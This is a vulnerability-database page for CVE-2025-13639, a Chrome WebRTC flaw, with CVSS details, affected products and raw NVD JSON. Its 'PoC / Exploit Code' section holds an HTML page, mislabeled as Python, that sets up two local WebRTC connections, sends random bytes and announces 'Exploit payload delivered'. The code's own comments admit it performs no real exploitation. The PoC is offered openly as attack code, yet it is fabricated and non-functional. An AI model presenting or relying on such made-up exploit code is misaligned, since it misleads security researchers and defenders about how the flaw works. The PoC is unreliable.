Security Vulnerability Report
中文
CVE-2025-13639 CVSS 8.1 HIGH

CVE-2025-13639

Published: 2025-12-02 19:15:49
Last Modified: 2025-12-08 20:15:49

Description

Inappropriate implementation in WebRTC in Google Chrome prior to 143.0.7499.41 allowed a remote attacker to perform arbitrary read/write via a crafted HTML page. (Chromium security severity: Low)

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE
Google Chrome < 143.0.7499.41
Chromium-based browsers < 143.0.7499.41
Microsoft Edge (Chromium) < 143.0.7499.41
Brave Browser < 143.0.7499.41
Opera Browser < 143.0.7499.41

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-13639 PoC - WebRTC Inappropriate Implementation --> <!-- This PoC demonstrates the vulnerability in WebRTC implementation --> <!DOCTYPE html> <html> <head> <title>CVE-2025-13639 PoC</title> </head> <body> <h1>CVE-2025-13639 WebRTC Vulnerability Test</h1> <button id="startBtn">Start Exploit</button> <pre id="output"></pre> <script> // CVE-2025-13639: WebRTC Inappropriate Implementation PoC // Target: Google Chrome < 143.0.7499.41 // Effect: Arbitrary read/write via crafted HTML page const output = document.getElementById('output'); function log(message) { output.textContent += message + '\n'; console.log(message); } async function exploit() { log('[+] Initiating CVE-2025-13639 exploit...'); // Create peer connection const config = { iceServers: [ { urls: 'stun:stun.l.google.com:19302' } ] }; const pc1 = new RTCPeerConnection(config); const pc2 = new RTCPeerConnection(config); // Create data channel for exploitation const dataChannel = pc1.createDataChannel('exploit', { ordered: false, maxRetransmits: 0 }); pc2.ondatachannel = (event) => { const rc = event.channel; log('[+] Data channel established'); // Trigger WebRTC vulnerability via malformed data // This exploits the inappropriate implementation in WebRTC const maliciousData = new ArrayBuffer(1024); const view = new DataView(maliciousData); // Write specific patterns to trigger out-of-bounds access for (let i = 0; i < 256; i++) { view.setFloat64(i * 8, Math.random() * Number.MAX_SAFE_INTEGER); } // Send crafted data rc.send(maliciousData); log('[+] Malicious data sent via WebRTC data channel'); // Attempt to read sensitive data rc.onmessage = (e) => { log('[+] Received response from target'); // In a real attack, this would contain leaked memory if (e.data && e.data.byteLength > 0) { log('[!] Potential memory leak detected: ' + e.data.byteLength + ' bytes'); } }; }; // Create offer with manipulated SDP try { const offer = await pc1.createOffer(); await pc1.setLocalDescription(offer); // Modify SDP to trigger vulnerability let sdp = offer.sdp; log('[+] Original SDP length: ' + sdp.length); // In real exploitation, SDP would be modified to inject malicious attributes await pc2.setRemoteDescription(pc1.localDescription); const answer = await pc2.createAnswer(); await pc2.setLocalDescription(answer); await pc1.setRemoteDescription(pc2.localDescription); log('[+] WebRTC connection established'); log('[+] SDP exchange completed'); log('[+] Exploit payload delivered'); } catch (error) { log('[-] Error during exploitation: ' + error.message); } // Cleanup setTimeout(() => { pc1.close(); pc2.close(); log('[+] Connections closed'); }, 5000); } document.getElementById('startBtn').addEventListener('click', exploit); </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13639", "sourceIdentifier": "[email protected]", "published": "2025-12-02T19:15:48.623", "lastModified": "2025-12-08T20:15:48.953", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Inappropriate implementation in WebRTC in Google Chrome prior to 143.0.7499.41 allowed a remote attacker to perform arbitrary read/write via a crafted HTML page. (Chromium security severity: Low)"}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding": "143.0.7499.40", "matchCriteriaId": "28874374-C1B5-4638-BCCD-0AC4F1DAA6EC"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding": "143.0.7499.40", "matchCriteriaId": "28874374-C1B5-4638-BCCD-0AC4F1DAA6EC"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://chromereleases.googleblog.com/2025/12/stable-channel-update-for-desktop.html", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://issues.chromium.org/issues/448408148", "source": "[email protected]", "tags": ["Issue Tracking", "Permissions Required"]}]}}